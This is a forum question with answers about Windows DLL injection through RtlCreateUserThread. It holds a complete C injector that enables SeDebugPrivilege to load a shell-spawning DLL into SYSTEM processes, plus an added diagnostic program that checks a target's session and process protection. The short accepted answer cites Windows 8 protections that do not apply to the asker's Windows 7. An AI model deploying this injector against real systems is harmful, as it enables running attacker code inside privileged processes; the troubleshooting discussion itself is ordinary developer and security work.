Injecting a DLL with RtlCreateUserThread

Time: 2016-06-22 08:32:27

Tags: dll-injection

I wrote a program that injects a DLL. I am using RtlCreateUserThread. Can anyone tell me what I am doing wrong here? I am able to inject the DLL into a process, and the injected DLL spawns a cmd shell when injected into a process running with the same privileges as mine, but when I inject it into a SYSTEM / Local Service account process it does not pop a shell. I am using cmd.dll from Didier Stevens' website (from ReactOS). I am trying this from Windows 7 32-bit.

#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* RtlCreateUserThread is undocumented and not declared in any public header,
   so CLIENT_ID and the function pointer type are defined here. */
typedef struct _CLIENT_ID
{
    PVOID UniqueProcess;
    PVOID UniqueThread;
} CLIENT_ID, *PCLIENT_ID;

/* Must be NTAPI (stdcall on x86): ntdll exports use stdcall, and a cdecl
   pointer would leave the stack unbalanced after the call on 32-bit. */
typedef LONG (NTAPI *_RtlCreateUserThread)(HANDLE ProcessHandle,
    PSECURITY_DESCRIPTOR SecurityDescriptor,
    BOOLEAN CreateSuspended, ULONG StackZeroBits,
    PULONG StackReserved, PULONG StackCommit,
    PVOID StartAddress, PVOID Parameter,
    PHANDLE ThreadHandle, PCLIENT_ID ClientId);

_RtlCreateUserThread RtlCreateUserThread;

int main(void)
{
    HANDLE hThd = NULL;
    CLIENT_ID cid;
    DWORD pid = 0;
    DWORD exit_code = 0;
    const char *dll = "cmd.dll";   /* path as the target process will resolve it */

    HMODULE ntdll = LoadLibraryA("ntdll.dll");
    HMODULE k32 = LoadLibraryA("kernel32.dll");

    RtlCreateUserThread = (_RtlCreateUserThread)GetProcAddress(ntdll, "RtlCreateUserThread");
    if (!ntdll || !k32 || !RtlCreateUserThread) {
        fprintf(stderr, "RtlCreateUserThread not found\n");
        return 1;
    }

    printf("Enter pid: ");
    if (scanf("%lu", &pid) != 1) {
        return 1;
    }

    /* Enable SeDebugPrivilege so OpenProcess succeeds on processes owned by
       other accounts (SYSTEM, LOCAL SERVICE). Needs an elevated admin token. */
    LUID luid;
    HANDLE token_handle;
    TOKEN_PRIVILEGES tp;
    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid);
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token_handle);
    AdjustTokenPrivileges(token_handle, FALSE, &tp, sizeof(tp), NULL, NULL);
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
        fprintf(stderr, "SeDebugPrivilege not held; run elevated\n");
    }
    CloseHandle(token_handle);

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProc) {
        fprintf(stderr, "OpenProcess failed: %lu\n", GetLastError());
        return 1;
    }

    /* The string is only read by LoadLibraryA in the target, so it needs
       PAGE_READWRITE and a NUL terminator, not executable memory. */
    SIZE_T len = strlen(dll) + 1;
    LPVOID vaex = VirtualAllocEx(hProc, NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!vaex || !WriteProcessMemory(hProc, vaex, dll, len, NULL)) {
        fprintf(stderr, "could not write DLL name into target: %lu\n", GetLastError());
        CloseHandle(hProc);
        return 1;
    }

    /* kernel32 is mapped at the same base in every process of the same bitness
       for a given boot, so the local LoadLibraryA address is valid in the
       target; injector and target must both be 32-bit here. */
    LONG status = RtlCreateUserThread(hProc, NULL, FALSE, 0, NULL, NULL,
                                      (PVOID)GetProcAddress(k32, "LoadLibraryA"),
                                      vaex, &hThd, &cid);
    if (status < 0) {
        fprintf(stderr, "RtlCreateUserThread failed: 0x%08lx\n", (unsigned long)status);
        CloseHandle(hProc);
        return 1;
    }
    WaitForSingleObject(hThd, INFINITE);

    /* The thread's exit code is LoadLibraryA's return value: 0 means the
       load failed inside the target (wrong path, missing dependency, ...). */
    GetExitCodeThread(hThd, &exit_code);
    printf("LoadLibraryA returned 0x%08lx\n", (unsigned long)exit_code);

    CloseHandle(hThd);
    CloseHandle(hProc);

    FreeLibrary(k32);
    FreeLibrary(ntdll);

    return exit_code ? 0 : 1;
}

Thanks, Raga.

1 answer:

Answer 0 (score: 0)

You cannot inject into system processes that have Protected Process Light protection.

Read Evolution of PPL and PPL Killer.

This is a new protection mechanism since Windows 8 / 8.1.
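Before blaming the injector, it helps to probe the target PID for the two things that decide the outcome of this technique. The program below is an added example, not code from the question or the answer. It reports the session the target runs in (since Vista, services run in session 0, which has no interactive desktop, so a console spawned there is not visible to the logged-on user), whether a PROCESS_ALL_ACCESS handle can be opened once SeDebugPrivilege is enabled, and, on Windows 8.1 and later, the process protection level the answer refers to. Assumptions: ProcessProtectionInformation is PROCESSINFOCLASS 61 and returns the one-byte PS_PROTECTION value laid out as Type (bits 0-2), Audit (bit 3), Signer (bits 4-7), as in the WDK ntddk.h; the name `ProcessProtectionInformation_Assumed` and the helper names are mine. The decoding helpers are portable; everything that calls the Win32 API sits behind `#ifdef _WIN32`.

```c
/* Added example (not from the original post): probe a target PID before
 * injecting. Assumption: ProcessProtectionInformation == 61 and the returned
 * byte is PS_PROTECTION { Type:3, Audit:1, Signer:4 } as in the WDK ntddk.h. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    unsigned type;   /* 0 = none, 1 = protected light (PPL), 2 = full protected */
    unsigned audit;  /* 1 = audit-only mode */
    unsigned signer; /* 0 none, 1 Authenticode, 2 CodeGen, 3 Antimalware,
                        4 Lsa, 5 Windows, 6 WinTcb, 7 WinSystem, 8 App */
} ps_protection_t;

/* Split a raw PS_PROTECTION.Level byte into its bit fields. */
ps_protection_t decode_ps_protection(unsigned char level)
{
    ps_protection_t p;
    p.type   =  level       & 0x07;
    p.audit  = (level >> 3) & 0x01;
    p.signer = (level >> 4) & 0x0F;
    return p;
}

const char *protection_type_name(unsigned type)
{
    static const char *names[] = { "None", "ProtectedLight", "Protected" };
    return type < 3 ? names[type] : "Unknown";
}

const char *protection_signer_name(unsigned signer)
{
    static const char *names[] = { "None", "Authenticode", "CodeGen", "Antimalware",
                                   "Lsa", "Windows", "WinTcb", "WinSystem", "App" };
    return signer < 9 ? names[signer] : "Unknown";
}

/* An unprotected caller cannot obtain PROCESS_VM_WRITE or PROCESS_CREATE_THREAD
 * on a protected process (PPL or full), so thread-based injection such as
 * RtlCreateUserThread + LoadLibraryA is blocked regardless of SeDebugPrivilege. */
int injection_blocked_by_protection(unsigned char level)
{
    return decode_ps_protection(level).type != 0;
}

#ifdef _WIN32
#include <windows.h>
#include <winternl.h>

enum { ProcessProtectionInformation_Assumed = 61 }; /* assumed PROCESSINFOCLASS value */

typedef NTSTATUS (NTAPI *NtQueryInformationProcess_t)(HANDLE, ULONG, PVOID, ULONG, PULONG);

static void enable_debug_privilege(void)
{
    HANDLE tok;
    TOKEN_PRIVILEGES tp = { 1 };
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid)) return;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &tok)) {
        AdjustTokenPrivileges(tok, FALSE, &tp, sizeof tp, NULL, NULL);
        CloseHandle(tok);
    }
}

int probe_target(DWORD pid)
{
    DWORD session = 0;
    if (ProcessIdToSessionId(pid, &session))
        printf("session %lu%s\n", session, session == 0 ?
               " (no interactive desktop: a console spawned there is invisible to the logged-on user)" : "");

    enable_debug_privilege();
    HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (h) {
        printf("PROCESS_ALL_ACCESS handle obtained\n");
    } else {
        printf("OpenProcess(PROCESS_ALL_ACCESS) failed, error %lu\n", GetLastError());
        h = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid); /* enough for the query */
        if (!h) return 1;
    }

    NtQueryInformationProcess_t query = (NtQueryInformationProcess_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQueryInformationProcess");
    unsigned char level = 0;
    ULONG len = 0;
    NTSTATUS st = query(h, ProcessProtectionInformation_Assumed, &level, sizeof level, &len);
    if (st == 0) {
        ps_protection_t p = decode_ps_protection(level);
        printf("protection: type=%s signer=%s audit=%u -> injection %s\n",
               protection_type_name(p.type), protection_signer_name(p.signer), p.audit,
               injection_blocked_by_protection(level) ? "blocked" : "not blocked by PPL");
    } else {
        printf("protection query failed (NTSTATUS 0x%08lx); expected before Windows 8.1\n",
               (unsigned long)st);
    }
    CloseHandle(h);
    return 0;
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <pid>\n", argv[0]); return 2; }
    return probe_target((DWORD)strtoul(argv[1], NULL, 10));
}
#endif
```

Run it elevated against the same PID you feed the injector. On Windows 7 the protection query fails with an NTSTATUS error because the information class does not exist there, which itself tells you that PPL cannot be the reason; a session value of 0 for a SYSTEM or LOCAL SERVICE target means any console the injected DLL creates will appear on a desktop you cannot see.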